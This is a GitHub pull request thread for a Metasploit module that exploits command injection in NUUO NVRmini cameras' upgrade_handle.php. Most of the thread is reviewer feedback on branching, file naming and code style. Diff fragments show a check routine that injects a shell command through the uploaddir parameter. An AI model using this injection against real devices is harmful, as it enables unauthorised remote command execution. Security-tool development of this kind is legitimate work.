### PR TITLE
nuuo_nvrmini_upgrade_rce

### PR DESCRIPTION
**Pull request by 0x45dd**
NUUO NVRmini  ip camera web application. The upgrade_handle.php file is affected by the remote command execution vulnerability.

Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/smb/ms08_067_netapi`
- [ ] ...
- [ ] **Verify** the thing does what it should
- [ ] **Verify** the thing does not do what it should not
- [ ] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

### CODE REVIEW

**Comment by bcoles** [comment]
It is required that code in your fork be merged **from a unique branch** in your repository to master in Rapid7's.  Please create a new branch in your fork of framework and resubmit this from that branch.

```
git checkout -b <BRANCH_NAME>
git push <your_fork_remote> <BRANCH_NAME>
```

This helps protect the process, ensure users are aware of commits on the branch being considered for merge, allows for a location for more commits to be offered without mingling with other contributor changes and allows contributors to make progress while a PR is still being reviewed.

Closing based on the this requirement, please do resubmit from a unique branch.

**Comment by bcoles** [comment]
`.rb` file extension is required.

`git mv  modules/exploits/linux/http/nuuo_nvrmini_upgrade_rce  modules/exploits/linux/http/nuuo_nvrmini_upgrade_rce.rb`

File: modules/exploits/linux/http/nuuo_nvrmini_upgrade_rce [hunk 1]
```diff
@@ -0,0 +1,78 @@
...
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         => 
+        [
+          'Berk Dusunur <@berkdusunur>', 
+          'numan turle <@numanturle>' 
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://www.exploit-db.com/exploits/45070/'],
```
Comment (bcoles) [inline modules/exploits/linux/http/nuuo_nvrmini_upgrade_rce]: No need to repeat this, as you have `['EDB','45070']` below.

File: modules/exploits/linux/http/nuuo_nvrmini_upgrade_rce [hunk 2]
```diff
@@ -0,0 +1,78 @@
...
+
+  end
+
+  def check
+    res = send_request_cgi({
+      'uri'     => normalize_uri(target_uri.path.to_s, "upgrade_handle.php"),
+      'vars_get'        =>
+        {
+          'cmd' => 'writeuploaddir',
+          'uploaddir' => "';echo 'exploit_ok';'"
```
Comment (bcoles) [inline modules/exploits/linux/http/nuuo_nvrmini_upgrade_rce]: Can `exploit_ok` be randomized?

File: modules/exploits/linux/http/nuuo_nvrmini_upgrade_rce [hunk 3]
```diff
@@ -0,0 +1,78 @@
...
+        }
+    })
+    if res.code == 200 and res.body =~ /upload_tmp_dir/
```
Comment (bcoles) [inline modules/exploits/linux/http/nuuo_nvrmini_upgrade_rce]: Check whether the request was successful first:

```ruby
unless res
  vprint_error 'Connection failed'
  return CheckCode::Unknown
end
```

File: modules/exploits/linux/http/nuuo_nvrmini_upgrade_rce [hunk 4]
```diff
@@ -0,0 +1,78 @@
...
+      return Exploit::CheckCode::Vulnerable
+    end
+    return Exploit::CheckCode::Safe
+  end
+
+  def http_send_command(cmd)
+    uri = normalize_uri(target_uri.path.to_s, "upgrade_handle.php")
+    res = send_request_cgi({
+      'method'  => 'GET',
+      'uri'             => uri,
```
Comment (bcoles) [inline modules/exploits/linux/http/nuuo_nvrmini_upgrade_rce]: Indentation messed up.

**Comment by berkdsnr** [comment]
Hello there. 

This is my first module, can you help me please

Best

**Comment by bcoles** [comment]
Hi @berkdsnr .

You can find a summary here: https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md

The short version is, from your fork of Metasploit, do this:

```git
git checkout master                        # ensure you're on the master branch
git branch nuuo_nvrmini_upgrade_rce        # create a new branch
git checkout nuuo_nvrmini_upgrade_rce      # switch to the new branch

# put your module in the modules/ directory
# mv /path/to/your/module modules/exploits/linux/http/nuuo_nvrmini_upgrade_rce.rb

git add modules/exploits/linux/http/nuuo_nvrmini_upgrade_rce.rb   # add your changes to the branch
git commit -m "Add nuuo_nvrmini_upgrade_rce module"   # commit your changes
git push origin nuuo_nvrmini_upgrade_rce   # push your new branch to GitHub
```

Then you can create your PR via the GitHub web interface.

**Comment by bcoles** [comment]
#11070

**Comment by bcoles** [comment]
#11071

**Comment by bcoles** [comment]
#11072

**Pull request closed without merging**